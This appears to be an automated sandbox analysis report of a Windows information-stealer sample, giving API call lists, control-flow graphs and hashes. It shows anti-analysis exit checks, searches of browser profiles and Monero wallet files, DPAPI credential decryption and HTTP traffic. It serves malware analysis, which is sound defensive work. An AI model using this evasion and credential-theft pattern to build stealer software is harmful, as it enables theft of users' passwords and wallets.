                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC6280: InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                  • Part of subcall function 00EC6280: StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC6303
                                  • Part of subcall function 00EC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                  • Part of subcall function 00EC6280: HttpOpenRequestA.WININET(00000000,GET,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC6385
                                  • Part of subcall function 00EC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                  • Part of subcall function 00EC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: ec0acd8ffbfc6cb678e7b1a2949ad7e5e2bf510e3618a90c44185990e0f3a1d3
                                • Instruction ID: 2cd4ac1931a053862da47214513487fd5b38d990b9214edd8ee62c2bc656c70c
                                • Opcode Fuzzy Hash: ec0acd8ffbfc6cb678e7b1a2949ad7e5e2bf510e3618a90c44185990e0f3a1d3
                                • Instruction Fuzzy Hash: 75112131900148ABCB18FF60DD56EED73B8EF50300F44516AF81A66292EF70AB07C691

                                Control-flow Graph (basic blocks and edges)

                                • 1493: ec1220-ec1247, call ed89b0, GlobalMemoryStatusEx; edges to 1496, 1497
                                • 1496: ec1249-ec1271, call edda00 * 2; edge to 1499
                                • 1497: ec1273-ec127a; edge to 1499
                                • 1499: ec1281-ec1285; edges to 1501, 1502
                                • 1501: ec129a-ec129d
                                • 1502: ec1287; edges to 1504, 1505
                                • 1504: ec1289-ec1290; edges to 1501, 1505
                                • 1505: ec1292-ec1294, ExitProcess
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
                                • ExitProcess.KERNEL32 ref: 00EC1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 55ddfa6102ad97908fad552aa2bb59df5b95bb2dd0aa7a41cf91ba7fd90f5aaf
                                • Instruction ID: 7a803a1b611b289c94e5370dea8e0f6004e78349a33670d11223df9db4607408
                                • Opcode Fuzzy Hash: 55ddfa6102ad97908fad552aa2bb59df5b95bb2dd0aa7a41cf91ba7fd90f5aaf
                                • Instruction Fuzzy Hash: 1601A2B0D44308BAEB14EBD0CD49FADB7B8EF00705F208049F705B62C1D7B555428798
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
                                • ExitProcess.KERNEL32 ref: 00EC1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: d88a8e8744bfd9ec89c3272cea82b0335ca0f827af4f54b019785812b769d10f
                                • Instruction ID: 97ecfab70612d0551d4a9b12fa60fdbce998406d5db83f3bf98ef69f416d1f29
                                • Opcode Fuzzy Hash: d88a8e8744bfd9ec89c3272cea82b0335ca0f827af4f54b019785812b769d10f
                                • Instruction Fuzzy Hash: 4BE08670D45308FBE7246BA0AD0AF0876B8AF04B02F104095F709771C1C6F526419798
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EC10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EC10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: cfff7aa77af324156223aaa624bba558a0a4e48b5713947d2465e3956fc72ec1
                                • Instruction ID: ba7f5d838f066ffc66f19302fcd4a02512f7d3b569123accf21d9f852d1125a4
                                • Opcode Fuzzy Hash: cfff7aa77af324156223aaa624bba558a0a4e48b5713947d2465e3956fc72ec1
                                • Instruction Fuzzy Hash: 31F0E271A41308BBE7149AA4AD5AFABB7E8E709B15F302458F504E3280D5729F40CBA0
                                APIs
                                  • Part of subcall function 00ED78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                  • Part of subcall function 00ED78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                  • Part of subcall function 00ED78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                  • Part of subcall function 00ED7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                  • Part of subcall function 00ED7850: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                  • Part of subcall function 00ED7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                • ExitProcess.KERNEL32 ref: 00EC11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: b9f0b50e322e3d0ba96c6cd156ba1606a406f1a2c9d2f07aa5629837a9c98c28
                                • Instruction ID: a51dbd862047ad33d8b38f73b7a83e2f1fc62558b157d629c3f63c3559d9515c
                                • Opcode Fuzzy Hash: b9f0b50e322e3d0ba96c6cd156ba1606a406f1a2c9d2f07aa5629837a9c98c28
                                • Instruction Fuzzy Hash: F2E0ECA5D1431152CA1873B4BD0AB2A32DC9B15349F08242ABA05A3247FA6AE8428665
                                APIs
                                • wsprintfA.USER32 ref: 00ED38CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED38E3
                                • lstrcat.KERNEL32(?,?), ref: 00ED3935
                                • StrCmpCA.SHLWAPI(?,00EE0F70), ref: 00ED3947
                                • StrCmpCA.SHLWAPI(?,00EE0F74), ref: 00ED395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED3C67
                                • FindClose.KERNEL32(000000FF), ref: 00ED3C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 0e9966ff2dc96f031a54658f806963257f58978f3922d2745355e803ae010537
                                • Instruction ID: fb0125aa11bdbb7c468afaa646c2742b151785b7766c718a5c85c43658a17bf3
                                • Opcode Fuzzy Hash: 0e9966ff2dc96f031a54658f806963257f58978f3922d2745355e803ae010537
                                • Instruction Fuzzy Hash: 1EA151B2A003089BDB35DB64DC85FEA73B8FF88300F044599A51DA7145EBB19B85CF62
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00EE0B32,00EE0B2B,00000000,?,?,?,00EE13F4,00EE0B2A), ref: 00ECBEF5
                                • StrCmpCA.SHLWAPI(?,00EE13F8), ref: 00ECBF4D
                                • StrCmpCA.SHLWAPI(?,00EE13FC), ref: 00ECBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECC7BF
                                • FindClose.KERNEL32(000000FF), ref: 00ECC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 6a5bc259f44482ea29a87d150feaca3b7efa6dd65098ac956377e74a20e1d206
                                • Instruction ID: d648c5f8a59ba8177503ff8557441d64b1b8b7e1567aa5f704a6e06a9f992579
                                • Opcode Fuzzy Hash: 6a5bc259f44482ea29a87d150feaca3b7efa6dd65098ac956377e74a20e1d206
                                • Instruction Fuzzy Hash: 054245729001085BCB18FB70DD56EED73BDEF44300F44556AF90AB6281EE359B4ACB92
                                APIs
                                • wsprintfA.USER32 ref: 00ED492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                • StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                • StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                • FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: b87acb3a315d382bc77ec8970b7e96db99202164a0ad99a8512a5ef493aaaae0
                                • Instruction ID: 9734229a052d8aaf151efa658316acde7dc0cb62b3e78b5783cd95bc4124d8ef
                                • Opcode Fuzzy Hash: b87acb3a315d382bc77ec8970b7e96db99202164a0ad99a8512a5ef493aaaae0
                                • Instruction Fuzzy Hash: 016165B1900218ABCB35EBA0EC45FEA73BCFF58301F048599B509A6145EB71DB85CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00ED4580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED4587
                                • wsprintfA.USER32 ref: 00ED45A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED45BD
                                • StrCmpCA.SHLWAPI(?,00EE0FC4), ref: 00ED45EB
                                • StrCmpCA.SHLWAPI(?,00EE0FC8), ref: 00ED4601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED468B
                                • FindClose.KERNEL32(000000FF), ref: 00ED46A0
                                • lstrcat.KERNEL32(?,00DAE9E0), ref: 00ED46C5
                                • lstrcat.KERNEL32(?,00DAD5F0), ref: 00ED46D8
                                • lstrlen.KERNEL32(?), ref: 00ED46E5
                                • lstrlen.KERNEL32(?), ref: 00ED46F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                APIs
                                • wsprintfA.USER32 ref: 00ED3EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED3EDA
                                • StrCmpCA.SHLWAPI(?,00EE0FAC), ref: 00ED3F08
                                • StrCmpCA.SHLWAPI(?,00EE0FB0), ref: 00ED3F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED406C
                                • FindClose.KERNEL32(000000FF), ref: 00ED4081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                APIs
                                • wsprintfA.USER32 ref: 00ECED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ECED55
                                • StrCmpCA.SHLWAPI(?,00EE1538), ref: 00ECEDAB
                                • StrCmpCA.SHLWAPI(?,00EE153C), ref: 00ECEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECF2AE
                                • FindClose.KERNEL32(000000FF), ref: 00ECF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE15B8,00EE0D96), ref: 00ECF71E
                                • StrCmpCA.SHLWAPI(?,00EE15BC), ref: 00ECF76F
                                • StrCmpCA.SHLWAPI(?,00EE15C0), ref: 00ECF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECFAB1
                                • FindClose.KERNEL32(000000FF), ref: 00ECFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE510C,?,?,?,00EE51B4,?,?,00000000,?,00000000), ref: 00EC1923
                                • StrCmpCA.SHLWAPI(?,00EE525C), ref: 00EC1973
                                • StrCmpCA.SHLWAPI(?,00EE5304), ref: 00EC1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EC1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00EC1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC1E20
                                • FindClose.KERNEL32(000000FF), ref: 00EC1E32
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EE0C2E), ref: 00ECDE5E
                                • StrCmpCA.SHLWAPI(?,00EE14C8), ref: 00ECDEAE
                                • StrCmpCA.SHLWAPI(?,00EE14CC), ref: 00ECDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECE3E0
                                • FindClose.KERNEL32(000000FF), ref: 00ECE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE14B0,00EE0C2A), ref: 00ECDAEB
                                • StrCmpCA.SHLWAPI(?,00EE14B4), ref: 00ECDB33
                                • StrCmpCA.SHLWAPI(?,00EE14B8), ref: 00ECDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECDDCC
                                • FindClose.KERNEL32(000000FF), ref: 00ECDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "w.$ *F5$!Wo$B[{$\+_?$u'c7$~KDY$*ns$h{C
                                • API String ID: 0-961883834
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00EE05AF), ref: 00ED7BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00ED7BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00ED7C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00ED7C62
                                • LocalFree.KERNEL32(00000000), ref: 00ED7D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !.$$;a$+YO/$3??]$>wj$Sts/$G{V
                                • API String ID: 0-177615432
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EE0D73), ref: 00ECE4A2
                                • StrCmpCA.SHLWAPI(?,00EE14F8), ref: 00ECE4F2
                                • StrCmpCA.SHLWAPI(?,00EE14FC), ref: 00ECE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                • LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: N
                                • API String ID: 4291131564-1689755984
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #|n^$<n;>$?O^}$Rzk$`%s$q7_
                                • API String ID: 0-325737757
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "CnY$&g_$H|$m}?$td9H
                                • API String ID: 0-3843161316
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ECC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ECC87C
                                • lstrcat.KERNEL32(?,00EE0B46), ref: 00ECC943
                                • lstrcat.KERNEL32(?,00EE0B47), ref: 00ECC957
                                • lstrcat.KERNEL32(?,00EE0B4E), ref: 00ECC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EC724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EC7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EC72A4
                                • LocalFree.KERNEL32(?), ref: 00EC72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ED961E
                                • Process32First.KERNEL32(00EE0ACA,00000128), ref: 00ED9632
                                • Process32Next.KERNEL32(00EE0ACA,00000128), ref: 00ED9647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00ED965C
                                • CloseHandle.KERNEL32(00EE0ACA), ref: 00ED967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %.sH$@P;~$P<N.$wo?$eu_
